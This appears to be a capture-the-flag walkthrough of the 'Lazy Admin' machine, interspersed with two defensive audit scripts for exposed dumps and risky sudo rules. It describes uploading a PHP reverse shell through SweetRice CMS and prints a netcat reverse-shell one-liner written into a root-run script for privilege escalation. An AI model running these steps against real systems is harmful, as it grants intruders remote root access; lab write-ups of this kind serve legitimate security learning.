Lazy Admin
HTTP Enumeration - SweetRice CMS - Perl binary Abuse
Initial enumeration
Only two ports were open: 22 and 80.
Enumerating port 80 gives us the endpoint /content. The server automatically appends a trailing slash to it, which means we'll have to enumerate further for more endpoints. Enumerating further gives us /content/as, a login page. Enumerating /content/inc leaks sensitive information; the interesting file was mysql_database_backup.sql.
It was basically a text file which contained a few usernames and an md5 hash.
Cracking that md5 hash gives Password123.
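The leak above is a database dump left inside the web document root, where the web server happily serves it. The following check is an added example, not part of the original writeup: it walks a document root supplied by the caller, lists files whose names mark them as dumps or backups, and flags those holding 32-hex-digit tokens (the shape of an unsalted MD5 password hash, which cracks about as quickly as the one above did). The file-name patterns are assumptions; extend them to match your own backup tooling.

```shell
#!/bin/sh
# Added example, not part of the original writeup: find database dumps and
# backup files sitting inside a web document root. Anything the web server
# can read there is one directory listing or guessed URL away from a visitor.
# The root path is supplied by the caller; the name patterns are assumptions.

# find_exposed_dumps ROOT: print files under ROOT whose name marks them as a
# dump or backup. Paths are assumed to contain no whitespace.
find_exposed_dumps() {
  find "$1" -type f \( -name '*.sql' -o -name '*.sql.gz' -o -name '*.bak' \
    -o -name '*.zip' -o -name '*.tar.gz' -o -name '*.old' \) 2>/dev/null
}

# contains_md5_hashes FILE: succeeds if FILE holds a standalone 32-hex-digit
# token, the shape of an unsalted MD5 password hash. Its presence raises the
# severity of the exposure, since such hashes crack in seconds.
contains_md5_hashes() {
  grep -Eq '(^|[^0-9a-fA-F])[0-9a-fA-F]{32}([^0-9a-fA-F]|$)' "$1"
}

# report_exposed_dumps ROOT: print one EXPOSED line per file found, marking
# the ones that also contain MD5-shaped hashes.
report_exposed_dumps() {
  for f in $(find_exposed_dumps "$1"); do
    if contains_md5_hashes "$f"; then
      echo "EXPOSED: $f (contains MD5-shaped hashes)"
    else
      echo "EXPOSED: $f"
    fi
  done
}

# count_exposed_dumps ROOT: print the number of exposed files under ROOT.
count_exposed_dumps() {
  find_exposed_dumps "$1" | wc -l | tr -d ' '
}
```

Run it against the document root of each site you host (for SweetRice that would be the directory holding /content) from a cron job or a CI step, and treat any non-zero count as a finding: dumps belong outside the web root, with a password hash format that is salted and slow rather than bare MD5.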
Exploitation
Exploring SweetRice CMS gave us an upload functionality under the theme section; uploaded files can later be accessed through the /_themes directory. Upload a PHP reverse shell and trigger it through the themes endpoint to get a shell.
Privilege Escalation
Listing the sudo rules with sudo -l gave us:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
The above line means that the perl binary may be run as root without a password, but only with the backup.pl file as its argument. So how do we abuse it to get a root shell? Let's cat out the /home/itguy/backup.pl file:
#!/usr/bin/perl
system("sh","/etc/copy.sh")
Why don't we just overwrite the /etc/copy.sh file with our reverse shell?
$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f' > /etc/copy.sh
Grab the root.txt :)
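The rule above is only dangerous because the script that root runs hands control to a second file that a low-privileged user can write. The following audit helper is an added example, not part of the original writeup: given one rule line in the format sudo -l prints, it checks whether the script is world-writable and whether any file the Perl script passes to system("sh", ...) is world-writable, which is exactly the chain exploited here. The rule text and paths are supplied by the caller; the interpreter list is an assumption.

```shell
#!/bin/sh
# Added example, not part of the original writeup: audit a sudo rule of the
# shape "(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl" for files that
# a non-root user could modify. Rule text and paths come from the caller.

# world_writable FILE: succeeds when FILE exists and "others" have write on it
# (9th character of the ls -l mode string), the weakness behind overwriting
# /etc/copy.sh above.
world_writable() {
  [ -e "$1" ] || return 1
  [ "$(ls -ld "$1" | cut -c9)" = "w" ]
}

# shell_callees SCRIPT: print the paths a Perl script passes to
# system("sh", "...") so they can be checked as well.
shell_callees() {
  grep -o 'system("sh", *"[^"]*")' "$1" 2>/dev/null | sed 's/.*"\([^"]*\)")$/\1/'
}

# audit_rule RULE: RULE is one line as printed by sudo -l.
# Prints one FINDING line per writable file reachable from the rule.
# Returns 0 when the rule looks safe, 1 when at least one finding was printed.
audit_rule() {
  rule=$1
  findings=0
  case "$rule" in
    *NOPASSWD:*) ;;
    *) return 0 ;;            # password-protected rules are out of scope here
  esac
  cmd=${rule#*NOPASSWD:}
  set -- $cmd                 # split "interpreter script" on whitespace
  interp=$1
  script=$2
  case "$interp" in
    */perl|*/python*|*/sh|*/bash) ;;   # assumed interpreter list
    *) return 0 ;;            # not an interpreter rule
  esac
  if [ -z "$script" ]; then
    echo "FINDING: $interp runs as root with no fixed script"
    return 1
  fi
  if world_writable "$script"; then
    echo "FINDING: $script is world-writable and is run as root via $interp"
    findings=$((findings + 1))
  fi
  for callee in $(shell_callees "$script"); do
    if world_writable "$callee"; then
      echo "FINDING: $script executes $callee, which is world-writable"
      findings=$((findings + 1))
    fi
  done
  [ "$findings" -eq 0 ]
}
```

Feed it each line of sudo -l output for the service accounts on a host (for example while reviewing /etc/sudoers.d changes); the fix for a finding is to make the script and every file it calls owned by root and mode 755 or tighter, or to replace the interpreter rule with a rule naming a single root-owned binary.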